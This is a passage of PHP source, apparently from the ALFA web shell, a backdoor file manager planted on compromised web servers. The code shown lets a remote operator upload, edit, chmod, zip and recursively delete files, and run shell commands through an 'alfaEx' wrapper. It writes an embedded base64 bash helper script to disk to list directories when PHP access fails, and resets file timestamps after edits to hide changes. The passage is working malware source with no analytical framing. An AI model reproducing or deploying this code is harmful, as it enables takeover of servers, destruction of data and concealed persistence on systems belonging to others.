  3058. if(!@is_readable($f))
  3059. $class = "main_red_perm";
  3060. elseif (!@is_writable($f))
  3061. $class = "main_white_perm";
  3062. else
  3063. $class = "main_green_perm";
  3064. }
  3065. return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
  3066. }
  3067. if(!function_exists("scandir")) {
  3068. function scandir($dir) {
  3069. $dh = opendir($dir);
  3070. while (false !== ($filename = readdir($dh)))
  3071. $files[] = $filename;
  3072. return $files;
  3073. }
  3074. }
  3075. function reArrayFiles($file_post){
  3076. $file_ary = array();
  3077. $file_count = count($file_post['name']);
  3078. $file_keys = array_keys($file_post);
  3079. for ($i=0; $i<$file_count; $i++) {
  3080. foreach ($file_keys as $key) {
  3081. $file_ary[$i][$key] = $file_post[$key][$i];
  3082. }
  3083. }
  3084. return $file_ary;
  3085. }
  3086. function _alfa_can_runCommand($cgi=true,$cache=true){
  3087.     if(isset($_SESSION["alfa_canruncmd"])&&$cache){
  3088.         return true;
  3089.     }
  3090.     if(strlen(alfaEx("whoami",false,$cgi))>0){
  3091.         $_SESSION["alfa_canruncmd"] = true;
  3092.         return true;
  3093.     }
  3094.     return false;
  3095. }
  3096. function _alfa_symlink($target, $link){
  3097.     $phpsym = function_exists("symlink");
  3098.     if($phpsym){
  3099.         @symlink($target, $link);
  3100.     }else{
  3101.         alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
  3102.     }
  3103. }
  3104. function _alfa_file_exists($file,$cgi=true){
  3105.     if(@file_exists($file)){
  3106.         return true;
  3107.     }else{
  3108.         if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
  3109.             return true;
  3110.         }
  3111.     }
  3112.     return false;
  3113. }
  3114. function _alfa_file($file,$cgi=true){
  3115.     $array = @file($file);
  3116.     if(!$array){
  3117.         if(strlen(alfaEx("id",false,$cgi))>0){
  3118.             $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
  3119.             if(strlen($data)>0){
  3120.                 return explode("\n", $data);
  3121.             }else{
  3122.                 return false;
  3123.             }
  3124.         }else{
  3125.             return false;
  3126.         }
  3127.     }else{
  3128.         return $array;
  3129.     }
  3130. }
  3131. function _alfa_is_writable($file){
  3132.     $check = false;
  3133.     $check = @is_writable($file);
  3134.     if(!$check){
  3135.         if(_alfa_can_runCommand()){
  3136.             $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
  3137.             if($check == "yes"){
  3138.                 $check = true;
  3139.             }else{
  3140.                 $check = false;
  3141.             }
  3142.         }
  3143.     }
  3144.     return $check;
  3145. }
  3146. function _alfa_is_dir($dir,$mode="-d"){
  3147.     $check = false;
  3148.     $check = @is_dir($dir);
  3149.     if(!$check){
  3150.         if(_alfa_can_runCommand()){
  3151.             $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
  3152.             if($check == "yes"){
  3153.                 return true;
  3154.             }else{
  3155.                 return false;
  3156.             }
  3157.         }
  3158.     }
  3159.     return $check;
  3160. }
  3161. function alfaFilesMan(){
  3162. alfahead();
  3163. AlfaNum(8,9,10,7,6,5,4);
  3164. echo '<div class="ajaxarea"><div class="header">';
  3165. if(!empty ($_COOKIE['f']))
  3166. $_COOKIE['f'] = @unserialize($_COOKIE['f']);
  3167. if(!empty($_POST['alfa1'])){
  3168. switch($_POST['alfa1']){
  3169. case 'uploadFile':
  3170. if(isset($GLOBALS['glob_chdir_false'])){
  3171.     $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3172.     $move_cmd_file = true;
  3173. }
  3174. $files = reArrayFiles($_FILES['f']);
  3175. foreach($files as $file){
  3176. if($move_cmd_file){
  3177.     alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
  3178. }else{
  3179.     @move_uploaded_file($file['tmp_name'],$file['name']);
  3180. }
  3181. echo "uped...!<Br>";
  3182. }
  3183. break;
  3184. case 'mkdir':
  3185. $new_dir_cmd = false;
  3186. if(isset($GLOBALS['glob_chdir_false'])){
  3187.     if(_alfa_can_runCommand(true,true)){
  3188.         alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
  3189.     }
  3190. }else{
  3191. if(!@mkdir(trim($_POST['alfa2'])))
  3192. echo "<b><font color='red'>Can't create new dir !</b></font>";
  3193. }
  3194. break;
  3195. case 'delete':
  3196. function deleteDir($path){
  3197. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  3198. $dh = @opendir($path);
  3199. while(($item = @readdir($dh)) !== false){
  3200. $item = $path.$item;
  3201. if((basename($item) == "..") || (basename($item) == "."))
  3202. continue;
  3203. $type = @filetype($item);
  3204. if ($type == "dir")
  3205. deleteDir($item);
  3206. else
  3207. @unlink($item);
  3208. }
  3209. @closedir($dh);
  3210. @rmdir($path);
  3211. }
  3212. if(is_array(@$_POST['f']))
  3213. foreach($_POST['f'] as $f){
  3214. if($f == '..')
  3215. continue;
  3216. $f = rawurldecode($f);
  3217. if(isset($GLOBALS["glob_chdir_false"])){
  3218.     if(_alfa_can_runCommand(true,true)){
  3219.         alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
  3220.     }
  3221. }else{
  3222. alfaEx("rm -rf '".addslashes($f)."'",false,false);
  3223. if(@is_dir($f))
  3224. deleteDir($f);
  3225. else
  3226. @unlink($f);
  3227. }
  3228. }
  3229. if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
  3230. deleteDir(rawurldecode(@$_POST['alfa2']));
  3231. alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
  3232. }else{
  3233. @unlink(rawurldecode(@$_POST['alfa2']));
  3234. }
  3235. if(isset($GLOBALS["glob_chdir_false"])){
  3236.     $source = rawurldecode(@$_POST['alfa2']);
  3237.     if($source!='..'&&!empty($source)){
  3238.         if(_alfa_can_runCommand(true,true)){
  3239.             alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
  3240.         }
  3241.     }
  3242. }
  3243. break;
  3244. case 'paste':
  3245. if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){
  3246. function copy_paste($c,$s,$d){
  3247. if(@is_dir($c.$s)){
  3248. @mkdir($d.$s);
  3249. $h = @opendir($c.$s);
  3250. while (($f = @readdir($h)) !== false)
  3251. if (($f != ".") and ($f != ".."))
  3252. copy_paste($c.$s.'/',$f, $d.$s.'/');
  3253. } elseif(is_file($c.$s))
  3254. @copy($c.$s, $d.$s);
  3255. }
  3256. foreach($_SESSION['f'] as $f)
  3257. copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
  3258. }elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){
  3259. function move_paste($c,$s,$d){
  3260. if(@is_dir($c.$s)){
  3261. @mkdir($d.$s);
  3262. $h = @opendir($c.$s);
  3263. while (($f = @readdir($h)) !== false)
  3264. if(($f != ".") and ($f != ".."))
  3265. copy_paste($c.$s.'/',$f, $d.$s.'/');
  3266. }elseif(@is_file($c.$s))
  3267. @copy($c.$s, $d.$s);
  3268. }
  3269. foreach($_SESSION['f'] as $f)
  3270. @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
  3271. }elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){
  3272. if(class_exists('ZipArchive')){
  3273. $zip = new ZipArchive();
  3274. $zipX = "alfa_".rand(1,1000).".zip";
  3275. if($zip->open($zipX, 1)){
  3276. @chdir($_SESSION['c']);
  3277. foreach($_SESSION['f'] as $f){
  3278. if($f == '..')continue;
  3279. if(@is_file($_SESSION['c'].$f))
  3280. $zip->addFile($_SESSION['c'].$f, $f);
  3281. elseif(@is_dir($_SESSION['c'].$f)){
  3282. $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
  3283. foreach($iterator as $key=>$value){
  3284. $key = str_replace('\\','/',realpath($key));
  3285. if(@is_dir($key)){
  3286. if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
  3287. }else{$zip->addFile($key,$key);}}}}
  3288. @chdir($GLOBALS['cwd']);
  3289. $zip->close();
  3290. __alert('>> '.$zipX.' << is created...');}}
  3291. }elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){
  3292. if(class_exists('ZipArchive')){
  3293. $zip = new ZipArchive();
  3294. foreach($_SESSION['f'] as $f) {
  3295. if($zip->open($_SESSION['c'].$f)){
  3296. $zip->extractTo($GLOBALS['cwd']);
  3297. $zip->close();}}}}
  3298. unset($_SESSION['f']);
  3299. break;
  3300. default:
  3301. if(!empty($_POST['alfa1'])){
  3302. $_SESSION['act'] = @$_POST['alfa1'];
  3303. $_SESSION['f'] = @$_POST['f'];
  3304. $_SESSION['c'] = @$_POST['c'];
  3305. }
  3306. break;
  3307. }
  3308. }
  3309. if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){
  3310.     $dirContent = @scandir($_SESSION[__LAST_CWD__]);
  3311. }else{
  3312.     $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  3313.     if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
  3314.         $path = explode('/', $res[1]);
  3315.         array_pop($path);
  3316.         $_POST['c'] = implode('/', $path);
  3317.     }
  3318.     $_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);
  3319. }
  3320. $cmd_dir = false;
  3321. if($dirContent === false){
  3322.     if(_alfa_can_runCommand(true,true)){
  3323.         @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  3324.         if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){
  3325.             $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
  3326.             alfaWriteTocgiapi("getdir.alfa",$bash);
  3327.         }
  3328.         if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";
  3329.         $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");
  3330.         $dirContent = json_decode($dirContent, true);
  3331.         if(is_array($dirContent)){
  3332.             array_pop($dirContent);
  3333.             $cmd_dir = true;
  3334.         }else{
  3335.             $dirContent = false;
  3336.         }
  3337.         $_SESSION["alfachdir_bash"] = true;
  3338.     }
  3339. }
  3340. if($dirContent == false){
  3341. echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
  3342. alfaFooter();
  3343. return;
  3344. }
  3345. global $sort;
  3346. $sort = array('name', 1);
  3347. if(!empty($_POST['alfa1'])) {
  3348. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
  3349. $sort = array($match[1], (int)$match[2]);
  3350. }
  3351. echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
  3352. $dirs = $files = array();
  3353. $n = count($dirContent);
  3354. for($i=0;$i<$n;$i++){
  3355. if($cmd_dir){
  3356. $filename = $dirContent[$i]["name"];
  3357. $file_owner = $dirContent[$i]["owner"];
  3358. $file_group = $dirContent[$i]["group"];
  3359. $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
  3360. $file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
  3361. $file_size = $dirContent[$i]["size"];
  3362. $file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];
  3363. }else{
  3364. $filename = $dirContent[$i];
  3365. $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
  3366. $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
  3367. $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
  3368. $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
  3369. $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
  3370. $file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
  3371. $file_size = @filesize($GLOBALS['cwd'].$filename);
  3372. $file_path = $GLOBALS['cwd'].$filename;
  3373. }
  3374. $tmp = array('name' => $filename,
  3375. 'path' => $file_path,
  3376. 'modify' => $file_modify,
  3377. 'perms' => $file_perm,
  3378. 'size' => $file_size,
  3379. 'owner' => $file_owner,
  3380. 'group' => $file_group
  3381. );
  3382. if(!$cmd_dir){
  3383. if(@is_file($file_path))
  3384. $files[] = array_merge($tmp, array('type' => 'file'));
  3385. elseif(@is_link($file_path))
  3386. $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
  3387. elseif(@is_dir($file_path)&& ($filename != "."))
  3388. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  3389. }else{
  3390.     if($dirContent[$i]["type"]=="file"){
  3391.         $files[] = array_merge($tmp, array('type' => 'file'));
  3392.     }else{
  3393.         if($dirContent[$i]["name"] != "."){
  3394.             $dirs[] = array_merge($tmp, array('type' => 'dir'));
  3395.         }
  3396.     }
  3397. }
  3398. }
  3399. $GLOBALS['sort'] = $sort;
  3400. function alfaCmp($a, $b) {
  3401. if($GLOBALS['sort'][0] != 'size')
  3402. return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  3403. else
  3404. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  3405. }
  3406. usort($files, "alfaCmp");
  3407. usort($dirs, "alfaCmp");
  3408. $files = array_merge($dirs, $files);
  3409. $l=0;
  3410. $cc=0;
  3411. foreach($files as $f){
  3412. $f['name'] = htmlspecialchars($f['name']);
  3413. $newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
  3414. $checkbox = 'checkbox'.$cc;
  3415. $raw_name = rawurlencode($f['name']);
  3416. $icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
  3417. $style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
  3418. echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
  3419. $f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
  3420. $l = $l?0:1;
  3421. $cc++;
  3422. }
  3423. echo "<tr><td colspan=7>
  3424. <input type=hidden name=a value='FilesMan'>
  3425. <input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>
  3426. <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
  3427. <select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
  3428. <input type='submit' value=' '>
  3429. </form></table></div></div>";
  3430. alfafooter();
  3431. }
  3432. function alfaFilesTools(){
  3433. alfahead();
  3434. echo '<div class="filestools">';
  3435. if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
  3436. $alfa1_decoded = $_POST['alfa1'];
  3437. $chdir_fals = false;
  3438. if(!@chdir($_POST['c'])){
  3439.     $chdir_fals = true;
  3440.     $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
  3441.     $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3442.     if($alfa_canruncmd){
  3443.         $slashed_alfa1 = addslashes($_POST['alfa1']);
  3444.         $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
  3445.         $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
  3446.     }
  3447. }
  3448. if($_POST['alfa2'] == 'auto'){
  3449. if(is_array(@getimagesize($_POST['alfa1']))){
  3450. $_POST['alfa2'] = 'image';
  3451. }else{
  3452.     $_POST['alfa2'] = 'view';
  3453.     if($chdir_fals){
  3454.         if($alfa_canruncmd){
  3455.             $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
  3456.             $mimetype = $mime[1];
  3457.             if(!empty($mimetype)){
  3458.                 if(strstr($mimetype, "image")){
  3459.                     $_POST['alfa2'] = 'image';
  3460.                 }
  3461.             }
  3462.         }
  3463.     }
  3464. }
  3465. }
  3466. if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
  3467. if(@$_POST['alfa2'] == 'mkfile'){
  3468. $_POST['alfa1'] = trim($_POST['alfa1']);
  3469. if($chdir_fals&&$alfa_canruncmd){
  3470.     if(_alfa_is_writable($_POST["c"])){
  3471.         alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
  3472.         $_POST['alfa2'] = "edit";
  3473.     }
  3474. }
  3475. if(!@file_exists($_POST['alfa1'])){
  3476. $fp = @fopen($_POST['alfa1'], 'w');
  3477. if($fp){
  3478. $_POST['alfa2'] = "edit";
  3479. fclose($fp);
  3480. }
  3481. }else{
  3482. $_POST['alfa2'] = "edit";
  3483. }
  3484. }
  3485. if(!_alfa_file_exists(@$_POST['alfa1'])){
  3486. echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
  3487. alfaFooter();
  3488. return;
  3489. }
  3490. if($chdir_fals){
  3491. $filesize = $file_info[3];
  3492. $uid["name"] = $file_info[1];
  3493. $gid["name"] = $file_info[2];
  3494. $permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
  3495. }else{
  3496. $uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
  3497. $gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
  3498. if(!$uid&&!$gid){
  3499. $uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
  3500. $gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
  3501. }
  3502. $permcolor = alfaPermsColor($_POST['alfa1']);
  3503. $filesize = @filesize($_POST['alfa1']);
  3504. if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
  3505.     if(_alfa_can_runCommand()){
  3506.         list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
  3507.     }
  3508. }
  3509. }
  3510. echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';
  3511. if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
  3512. if(!_alfa_is_dir($_POST['alfa1'])){
  3513. $m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
  3514. $ftype = "file";
  3515. }else{
  3516. $m = array('Chmod', 'Rename', 'Touch');
  3517. $ftype = "dir";
  3518. }
  3519. foreach($m as $v)
  3520. echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
  3521. echo '<br><br>';
  3522. switch($_POST['alfa2']){
  3523. case 'view':
  3524. @chdir($_POST['c']);
  3525. echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
  3526. echo htmlspecialchars(__read_file($_POST['alfa1']));
  3527. echo '</pre></div></div>';
  3528. break;
  3529. case 'highlight':
  3530. @chdir($_POST['c']);
  3531. if(@is_readable($_POST['alfa1'])){
  3532. echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
  3533. $code = @highlight_file($_POST['alfa1'],true);
  3534. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
  3535. }
  3536. break;
  3537. case 'delete':
  3538. @chdir($_POST['c']);
  3539. if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
  3540. $deleted = true;
  3541. if(!@unlink($_POST['alfa1'])){
  3542.     $deleted = false;
  3543.     if($alfa_canruncmd){
  3544.         if(_alfa_is_writable($_POST['alfa1'])){
  3545.             alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
  3546.             $deleted = true;
  3547.         }
  3548.     }
  3549. }
  3550. if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
  3551. break;
  3552. case 'chmod':
  3553. @chdir($_POST['c']);
  3554. if(!empty($_POST['alfa3'])){
  3555. $perms = 0;
  3556. for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
  3557. $perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
  3558. if(!@chmod($_POST['alfa1'], $perms)){
  3559. if($chdir_fals&&$alfa_canruncmd){
  3560. alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
  3561. echo('Success!');
  3562. }else{
  3563. echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
  3564. }else{echo('Success!');}
  3565. }
  3566. clearstatcache();
  3567. AlfaNum(8,9,10,7,6,5,4,2,1);
  3568. if($chdir_fals){
  3569.     $file_perm = $file_info[5];
  3570. }else{
  3571.     $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
  3572. }
  3573. echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
  3574. break;
  3575. case 'edit':
  3576. @chdir($_POST['c']);
  3577. if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
  3578. echo 'File isn\'t writeable';
  3579. break;
  3580. }
  3581. if(!empty($_POST['alfa3'])){
  3582. $_POST['alfa3'] = substr($_POST['alfa3'],1);
  3583. $time = @filemtime($_POST['alfa1']);
  3584. $fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
  3585. if($chdir_fals&&$alfa_canruncmd){
  3586.     $rname = $alfa1_decoded;
  3587.     $randname = $rname.rand(111,9999);
  3588.     $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
  3589.     if($fp = @__write_file($filepath ,$_POST['alfa3'])){
  3590.         alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
  3591.     }
  3592. }
  3593. if($fp){
  3594. echo 'Saved!<br><script>alfa3_="";</script>';
  3595. @touch($_POST['alfa1'],$time,$time);
  3596. }
  3597. }
  3598. echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
  3599. echo htmlspecialchars(__read_file($_POST['alfa1']));
  3600. echo '</textarea><p><input type="submit" value=" "></p></form>';
  3601. break;
  3602. case 'hexdump':
  3603. @chdir($_POST['c']);
  3604. $c = __read_file($_POST['alfa1']);
  3605. $n = 0;
  3606. $h = array('00000000<br>','','');
  3607. $len = strlen($c);
  3608. for ($i=0; $i<$len; ++$i) {
  3609. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  3610. switch ( ord($c[$i]) ) {
  3611. case 0: $h[2] .= ' '; break;
  3612. case 9: $h[2] .= ' '; break;
  3613. case 10: $h[2] .= ' '; break;
  3614. case 13: $h[2] .= ' '; break;
  3615. default: $h[2] .= $c[$i]; break;
  3616. }
  3617. $n++;
  3618. if ($n == 32) {
  3619. $n = 0;
  3620. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  3621. $h[1] .= '<br>';
  3622. $h[2] .= "\n";
  3623. }
